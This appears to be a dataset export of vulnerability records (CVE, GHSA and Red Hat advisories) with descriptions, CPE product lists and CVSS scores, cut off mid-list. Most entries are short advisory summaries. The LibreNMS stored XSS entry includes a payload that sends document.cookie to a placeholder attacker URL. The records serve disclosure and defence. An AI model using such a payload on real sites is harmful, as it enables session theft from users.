id
stringlengths
12
47
title
stringlengths
0
256
description
stringlengths
3
197k
cpes
sequencelengths
0
5.42k
cvss_v4_0
float64
0
10
cvss_v3_1
float64
0
10
cvss_v3_0
float64
0
10
cvss_v2_0
float64
0
10
CVE-2010-4691
Unspecified vulnerability on Cisco Adaptive Security Appliances (ASA) 5500 series devices with software before 8.3(2) allows remote attackers to cause a denial of service (device crash) via multicast traffic, aka Bug IDs CSCtg61810 and CSCtg69742.
[ "cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:7.0\\(0\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:7.0\\(2\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:7.0\\(4\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:7.0\\(5\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:7.0\\(5.2\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:7.0\\(6.7\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:7.0.1.4:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:7.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:7.0.4:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:7.0.4.3:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:7.0.5:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:7.0.6:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:7.0.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:7.0.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:7.0.8:interim:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:7.1:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:7.1\\(2\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:7.1\\(2.5\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:7.1\\(2.27\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:7.1\\(2.48\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:7.1\\(2.49\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:7.1\\(5\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:7.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:7.1.2:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:7.2\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:7.2\\(1.22\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:7.2\\(2\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:7.2\\(2.5\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:7.2\\(2.7\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:7.2\\(2.8\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:7.2\\(2.10\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:7.2\\(2.14\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:7.2\\(2.15\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:7.2\\(2.16\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:7.2\\(2.17\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:7.2\\(2.18\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:7.2\\(2.19\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:7.2\\(2.48\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:7.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:7.2.2:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:7.2.3:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:7.2.4:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:7.2.5:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:8.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:8.0.3:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:8.0.4:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:8.0.5:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:8.2\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:8.2\\(2\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:8.2\\(3\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:8.2\\(3.9\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:8.2\\(4\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:8.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:8.2.2:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:adaptive_security_appliance_software:8.2.2:interim:*:*:*:*:*:*", "cpe:2.3:h:cisco:5500_series_adaptive_security_appliance:*:*:*:*:*:*:*:*", "cpe:2.3:h:cisco:asa_5500:*:*:*:*:*:*:*:*" ]
null
null
null
7.8
CVE-2017-9251
andrzuk/FineCMS through 2017-05-28 is vulnerable to a reflected XSS in the sitename parameter to admin.php.
[ "cpe:2.3:a:finecms_project:finecms:-:*:*:*:*:*:*:*" ]
null
null
6.1
4.3
GHSA-g8xp-6gmf-pqc7
phpGroupWare 0.9.14.005 and earlier allow remote attackers to obtain sensitive information via a direct request to (1) hook_admin.inc.php, (2) hook_home.inc.php, (3) class.holidaycalc.inc.php, and (4) setup.inc.php.sample, which reveals the path in an error message.
[]
null
null
null
null
CVE-2020-6069
An exploitable out-of-bounds write vulnerability exists in the igcore19d.dll JPEG jpegread precision parser of the Accusoft ImageGear 19.5.0 library. A specially crafted JPEG file can cause an out-of-bounds write, resulting in a remote code execution. An attacker needs to provide a malformed file to the victim to trigger the vulnerability.
[ "cpe:2.3:a:accusoft:imagegear:19.5.0:*:*:*:*:*:*:*" ]
null
null
9.8
null
GHSA-828j-hg8h-vf6g
The Realteo WordPress plugin before 1.2.4, used by the Findeo Theme, did not ensure that the requested property to be deleted belong to the user making the request, allowing any authenticated users to delete arbitrary properties by tampering with the property_id parameter.
[]
null
6.5
null
null
CVE-2019-19458
SALTO ProAccess SPACE 5.4.3.0 allows Directory Traversal in the Data Export feature.
[ "cpe:2.3:a:saltosystem:proaccess_space:*:*:*:*:*:*:*:*" ]
null
8.6
null
5
GHSA-fxrj-6xr6-jph9
SQL injection vulnerability in the categoriesServlet servlet in dotCMS before 3.3.1 allows remote not authenticated attackers to execute arbitrary SQL commands via the sort parameter.
[]
null
null
9.8
null
GHSA-mf63-58j7-3j76
Mattermost fails to properly validate markdown, allowing an attacker to crash the server via a specially crafted markdown input.
[]
null
4.3
null
null
GHSA-m2mq-qhg4-vp92
Buffer overflow in ssldump 0.9b2 and earlier, when running in decryption mode, allows remote attackers to execute arbitrary code via a long RSA PreMasterSecret.
[]
null
null
null
null
CVE-2023-46006
Sourcecodester Best Courier Management System 1.0 is vulnerable to SQL Injection via the parameter id in /edit_user.php.
[ "cpe:2.3:a:mayurik:best_courier_management_system:1.0:*:*:*:*:*:*:*" ]
null
9.8
null
null
GHSA-xxv6-ggg8-68mq
An information disclosure vulnerability exists in the /proc/pid/syscall functionality of Linux Kernel 5.1 Stable and 5.4.66. More specifically, this issue has been introduced in v5.1-rc4 (commit 631b7abacd02b88f4b0795c08b54ad4fc3e7c7c0) and is still present in v5.10-rc4, so it’s likely that all versions in between are affected. An attacker can read /proc/pid/syscall to trigger this vulnerability, which leads to the kernel leaking memory contents.
[]
null
5.5
null
null
CVE-2021-44566
A Cross Site Scripting (XSS) vulnerability exists in RosarioSIS before 4.3 via the SanitizeMarkDown function in ProgramFunctions/MarkDownHTML.fnc.php.
[ "cpe:2.3:a:rosariosis:rosariosis:*:*:*:*:*:*:*:*" ]
null
5.4
null
3.5
CVE-2016-10760
On Seowon Intech routers, there is a Command Injection vulnerability in diagnostic.cgi via shell metacharacters in the ping_ipaddr parameter.
[ "cpe:2.3:o:seowonintech:swr-300a_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:h:seowonintech:swr-300a:-:*:*:*:*:*:*:*", "cpe:2.3:o:seowonintech:swr-300b_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:h:seowonintech:swr-300b:-:*:*:*:*:*:*:*", "cpe:2.3:o:seowonintech:swr-300c_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:h:seowonintech:swr-300c:-:*:*:*:*:*:*:*", "cpe:2.3:o:seowonintech:swr-300bg_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:h:seowonintech:swr-300bg:-:*:*:*:*:*:*:*" ]
null
null
9.8
10
CVE-2006-2106
Cross-site scripting (XSS) vulnerability in Edgewall Software Trac 0.9.4 and earlier allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors related to a "wiki macro."
[ "cpe:2.3:a:edgewall_software:trac:0.9.4:*:*:*:*:*:*:*" ]
null
null
null
4.3
CVE-2025-23179
Ribbon Communications - CWE-798: Use of Hard-coded Credentials
CWE-798: Use of Hard-coded Credentials
[]
null
5.5
null
null
GHSA-xvpj-rpwv-6v3h
Deserialization of Untrusted Data vulnerability in giuliopanda ADFO allows Object Injection. This issue affects ADFO: from n/a through 1.9.1.
[]
null
7.2
null
null
CVE-2015-0861
model/modelstorage.py in trytond 3.2.x before 3.2.10, 3.4.x before 3.4.8, 3.6.x before 3.6.5, and 3.8.x before 3.8.1 allows remote authenticated users to bypass intended access restrictions and write to arbitrary fields via a sequence of records.
[ "cpe:2.3:a:tryton:trytond:*:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*" ]
null
null
4.3
4
GHSA-jwfg-4jfx-2ch4
Missing Authorization vulnerability in richtexteditor Rich Text Editor allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Rich Text Editor: from n/a through 1.0.1.
[]
null
6.5
null
null
GHSA-rw9r-ggxf-2434
Zeus Web Server before 4.3r5 does not use random transaction IDs for DNS requests, which makes it easier for remote attackers to spoof DNS responses.
[]
null
null
null
null
GHSA-q34q-rp37-4pjq
The dzs-zoomsounds plugin through 2.0 for WordPress has admin/upload.php arbitrary file upload.
[]
null
null
null
null
CVE-2025-6951
SAFECAM X300 FTP Service default credentials
A vulnerability classified as problematic was found in SAFECAM X300 up to 20250611. This vulnerability affects unknown code of the component FTP Service. The manipulation leads to use of default credentials. Access to the local network is required for this attack to succeed. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
[]
5.3
4.3
4.3
3.3
GHSA-c2r6-w3hh-33v8
Buffer overflow in fbserver.exe in Firebird SQL 2 before 2.0.1 allows remote attackers to execute arbitrary code via a large p_cnct_count value in a p_cnct structure in a connect (0x01) request to port 3050/tcp, related to "an InterBase version of gds32.dll."
[]
null
null
null
null
CVE-2025-21944
ksmbd: fix bug on trap in smb2_lock
In the Linux kernel, the following vulnerability has been resolved: ksmbd: fix bug on trap in smb2_lock If lock count is greater than 1, flags could be old value. It should be checked with flags of smb_lock, not flags. It will cause bug-on trap from locks_free_lock in error handling routine.
[]
null
null
null
null
CVE-2021-23979
Mozilla developers reported memory safety bugs present in Firefox 85. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 86.
[ "cpe:2.3:a:mozilla:firefox:*:*:*:*:*:*:*:*" ]
null
8.8
null
6.8
CVE-2020-25217
Grandstream GRP261x VoIP phone running firmware version 1.0.3.6 (Base) allows Command Injection as root in its administrative web interface.
[ "cpe:2.3:o:grandstream:grp2612_firmware:1.0.3.6:*:*:*:*:*:*:*", "cpe:2.3:h:grandstream:grp2612:-:*:*:*:*:*:*:*", "cpe:2.3:o:grandstream:grp2612p_firmware:1.0.3.6:*:*:*:*:*:*:*", "cpe:2.3:h:grandstream:grp2612p:-:*:*:*:*:*:*:*", "cpe:2.3:o:grandstream:grp2612w_firmware:1.0.3.6:*:*:*:*:*:*:*", "cpe:2.3:h:grandstream:grp2612w:-:*:*:*:*:*:*:*", "cpe:2.3:o:grandstream:grp2613_firmware:1.0.3.6:*:*:*:*:*:*:*", "cpe:2.3:h:grandstream:grp2613:-:*:*:*:*:*:*:*", "cpe:2.3:o:grandstream:grp2614_firmware:1.0.3.6:*:*:*:*:*:*:*", "cpe:2.3:h:grandstream:grp2614:-:*:*:*:*:*:*:*", "cpe:2.3:o:grandstream:grp2615_firmware:1.0.3.6:*:*:*:*:*:*:*", "cpe:2.3:h:grandstream:grp2615:-:*:*:*:*:*:*:*", "cpe:2.3:o:grandstream:grp2616_firmware:1.0.3.6:*:*:*:*:*:*:*", "cpe:2.3:h:grandstream:grp2616:-:*:*:*:*:*:*:*" ]
null
7.2
null
9
CVE-2015-2051
The D-Link DIR-645 Wired/Wireless Router Rev. Ax with firmware 1.04b12 and earlier allows remote attackers to execute arbitrary commands via a GetDeviceSettings action to the HNAP interface.
[ "cpe:2.3:h:dlink:dir-645:*:*:*:*:*:*:*:*", "cpe:2.3:o:dlink:dir-645_firmware:1.03:*:*:*:*:*:*:*", "cpe:2.3:o:dlink:dir-645_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:h:dlink:dir-645:a1:*:*:*:*:*:*:*" ]
null
8.8
null
10
CVE-2024-38822
CVE-2024-38822 Salt Advisory
Multiple methods in the salt master skip minion token validation. Therefore a misbehaving minion can impersonate another minion.
[]
null
2.7
null
null
GHSA-3v5j-fv58-rhv5
Opera before 12.00 Beta allows user-assisted remote attackers to cause a denial of service (application hang) via JavaScript code that changes a form before submission.
[]
null
null
null
null
GHSA-j2j9-7pr6-xqwv
LibreNMS has Stored Cross-site Scripting vulnerability in "Alert Rules" feature
SummaryA Stored Cross-Site Scripting (XSS) vulnerability in the "Alert Rules" feature allows authenticated users to inject arbitrary JavaScript through the "Title" field. This vulnerability can lead to the execution of malicious code in the context of other users' sessions, potentially compromising their accounts and allowing unauthorized actions.DetailsThe vulnerability occurs when creating an alert rule. The application does not properly sanitize user inputs in the "Title" field, which allows an attacker to escape the attribute context where the title is injected (data-content). Despite some character restrictions, the attacker can still inject a payload that leverages available attributes on the div element to execute JavaScript automatically when the page loads.For example, the following payload can be used: ```test1'' autofocus onfocus="document.location='https://<attacker-url>/logger.php?c='+document.cookie"```This payload triggers the XSS when the affected page is loaded, automatically redirecting the user to the attacker's controlled domain with any non-httponly cookies present.The vulnerability stems from the application not sanitizing the value of $rule['name'] before adding it to the $enabled_msg variable. This is evident in the code:https://github.com/librenms/librenms/blob/9455173edce6971777cf6666d540eeeaf6201920/includes/html/print-alert-rules.php#L405PoCCreate a new alert rule in the LibreNMS interface.In the "Title" field, input the following payload: ```test1'' autofocus onfocus="document.location='https://<attacker-url>/logger.php?c='+document.cookie"```Save the rule and trigger the alert.Observe that when the page loads, the injected JavaScript executes and redirects the user, sending their non-httponly cookies to the attacker's server.Example Request:ImpactIt could allow authenticated users to execute arbitrary JavaScript code in the context of other users' sessions. Impacted users could have their accounts compromised, enabling the attacker to perform unauthorized actions on their behalf.
[]
5
7.5
null
null
RHSA-2008:0364
Red Hat Security Advisory: mysql security and bug fix update
Mysql log file obfuscation MySQL improper permission revocation mysql improper suid argument evaluation mysql: daemon crash via EXPLAIN on queries on information schema Single MySQL worker can be crashed (NULL deref) with certain SELECT statements mysql: DoS via statement with crafted IF clause mysql DROP privilege not enforced when renaming tables mysql SECURITY INVOKER functions do not drop privileges New release of MySQL fixes security bugs New release of MySQL fixes security bugs
[ "cpe:/o:redhat:enterprise_linux:5::client", "cpe:/o:redhat:enterprise_linux:5::client_workstation", "cpe:/o:redhat:enterprise_linux:5::server" ]
null
null
null
null
GHSA-q6r2-x2cc-vrp7
Git LFS permits exfiltration of credentials via crafted HTTP URLs
ImpactWhen Git LFS requests credentials from Git for a remote host, it passes portions of the host's URL to the `git-credential(1)` command without checking for embedded line-ending control characters, and then sends any credentials it receives back from the Git credential helper to the remote host. By inserting URL-encoded control characters such as line feed (LF) or carriage return (CR) characters into the URL, an attacker may be able to retrieve a user's Git credentials.PatchesThis problem exists in all previous versions and is patched in v3.6.1. All users should upgrade to v3.6.1.WorkaroundsThere are no workarounds known at this time.Referenceshttps://github.com/git-lfs/git-lfs/security/advisories/GHSA-q6r2-x2cc-vrp7https://nvd.nist.gov/vuln/detail/CVE-2024-53263https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-53263https://github.com/git-lfs/git-lfs/releases/tag/v3.6.1[git-lfs/git-lfs@0345b6f816](https://github.com/git-lfs/git-lfs/commit/0345b6f816e611d050c0df67b61f0022916a1c90)For more informationIf you have any questions or comments about this advisory:For general questions, start a discussion in the Git LFS [discussion forum](https://github.com/git-lfs/git-lfs/discussions).For reports of additional vulnerabilities, please follow the Git LFS [security reporting policy](https://github.com/git-lfs/git-lfs/blob/main/SECURITY.md).
[]
8.5
null
null
null
CVE-2020-8161
A directory traversal vulnerability exists in rack < 2.2.0 that allows an attacker perform directory traversal vulnerability in the Rack::Directory app that is bundled with Rack which could result in information disclosure.
[ "cpe:2.3:a:rack_project:rack:*:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*" ]
null
8.6
null
5
GHSA-8cr8-qjq3-88h7
PHP remote file inclusion vulnerability in album_portal.php in phpBB modified by Przemo 1.8 allows remote attackers to execute arbitrary PHP code via the phpbb_root_path parameter.
[]
null
null
null
null
GHSA-rhc9-2644-9f3r
The lqt_frame_duration function in lqt_quicktime.c in libquicktime 1.2.4 allows remote attackers to cause a denial of service (invalid memory read and application crash) via a crafted mp4 file.
[]
null
null
6.5
null
CVE-2024-31455
Minder GetRepositoryByName data leak
Minder by Stacklok is an open source software supply chain security platform. A refactoring in commit `5c381cf` added the ability to get GitHub repositories registered to a project without specifying a specific provider. Unfortunately, the SQL query for doing so was missing parenthesis, and would select a random repository. This issue is patched in pull request 2941. As a workaround, revert prior to `5c381cf`, or roll forward past `2eb94e7`.
[]
null
4.3
null
null
CVE-2020-0672
An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0668, CVE-2020-0669, CVE-2020-0670, CVE-2020-0671.
[ "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*" ]
null
7.8
null
7.2
GHSA-4hjh-mpfm-qhm5
An issue was discovered in GNOME gvfs 1.29.4 through 1.41.2. daemon/gvfsbackendadmin.c mishandles file ownership because setfsuid is not used.
[]
null
null
null
null
GHSA-qjp6-3q94-9rwq
In telephony service, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed.
[]
null
5.5
null
null
CVE-2003-0252
Off-by-one error in the xlog function of mountd in the Linux NFS utils package (nfs-utils) before 1.0.4 allows remote attackers to cause a denial of service and possibly execute arbitrary code via certain RPC requests to mountd that do not contain newlines.
[ "cpe:2.3:a:linux-nfs:nfs-utils:*:*:*:*:*:*:*:*" ]
null
9.8
null
10
GHSA-5hjg-m862-88fc
In the Linux kernel, the following vulnerability has been resolved:bpf: Avoid uninitialized value in BPF_CORE_READ_BITFIELD[Changes from V1:Use a default branch in the switch statement to initialize `val'.]GCC warns that `val' may be used uninitialized in the BPF_CRE_READ_BITFIELD macro, defined in bpf_core_read.h as:This patch adds a default entry in the switch statement that sets `val' to zero in order to avoid the warning, and random values to be used in case __builtin_preserve_field_info returns unexpected values for BPF_FIELD_BYTE_SIZE.Tested in bpf-next master. No regressions.
[]
null
7.8
null
null
CVE-2023-51698
Atril's CBT comic book parsing vulnerable to Remote Code Execution
Atril is a simple multi-page document viewer. Atril is vulnerable to a critical Command Injection Vulnerability. This vulnerability gives the attacker immediate access to the target system when the target user opens a crafted document or clicks on a crafted link/URL using a maliciously crafted CBT document which is a TAR archive. A patch is available at commit ce41df6.
[ "cpe:2.3:a:mate-desktop:atril:*:*:*:*:*:*:*:*" ]
null
9.6
null
null
CVE-2018-11232
The etm_setup_aux function in drivers/hwtracing/coresight/coresight-etm-perf.c in the Linux kernel before 4.10.2 allows attackers to cause a denial of service (panic) because a parameter is incorrectly used as a local variable.
[ "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*" ]
null
null
5.5
4.9
CVE-2021-36172
An improper restriction of XML external entity reference vulnerability in the parser of XML responses of FortiPortal before 6.0.6 may allow an attacker who controls the producer of XML reports consumed by FortiPortal to trigger a denial of service or read arbitrary files from the underlying file system by means of specifically crafted XML documents.
[ "cpe:2.3:a:fortinet:fortiportal:*:*:*:*:*:*:*:*" ]
null
4.3
null
null
CVE-2009-0508
The Servlet Engine/Web Container and JSP components in IBM WebSphere Application Server (WAS) 5.1.0, 5.1.1.19, 6.0.2 before 6.0.2.35, 6.1 before 6.1.0.23, and 7.0 before 7.0.0.3 allow remote attackers to read arbitrary files contained in war files in (1) web-inf, (2) meta-inf, and unspecified other directories via unknown vectors, related to (a) web-based applications and (b) the administrative console.
[ "cpe:2.3:a:ibm:websphere_application_server:5.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:5.1.1.19:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.0.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.0.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.0.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.0.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.0.2.9:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.0.2.11:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.0.2.15:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.0.2.17:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.0.2.19:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.0.2.21:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.0.2.23:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.0.2.25:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.0.2.27:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.0.2.29:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.0.2.31:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.0.2.33:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.19:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.21:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:7.0.0.1:*:*:*:*:*:*:*" ]
null
null
null
7.5
GHSA-7q25-cj2m-mf87
IrfanView 4.54 allows attackers to cause a denial of service or possibly other unspecified impacts via a crafted .cr2 file, related to a "Data from Faulting Address controls Branch Selection starting at FORMATS!GetPlugInInfo+0x00000000000047f6".
[]
null
null
null
null
CVE-2012-3365
The SQLite functionality in PHP before 5.3.15 allows remote attackers to bypass the open_basedir protection mechanism via unspecified vectors.
[ "cpe:2.3:a:php:php:*:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:2.0b10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta_4_patch1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.2:*:*:*:*:*:*:*", 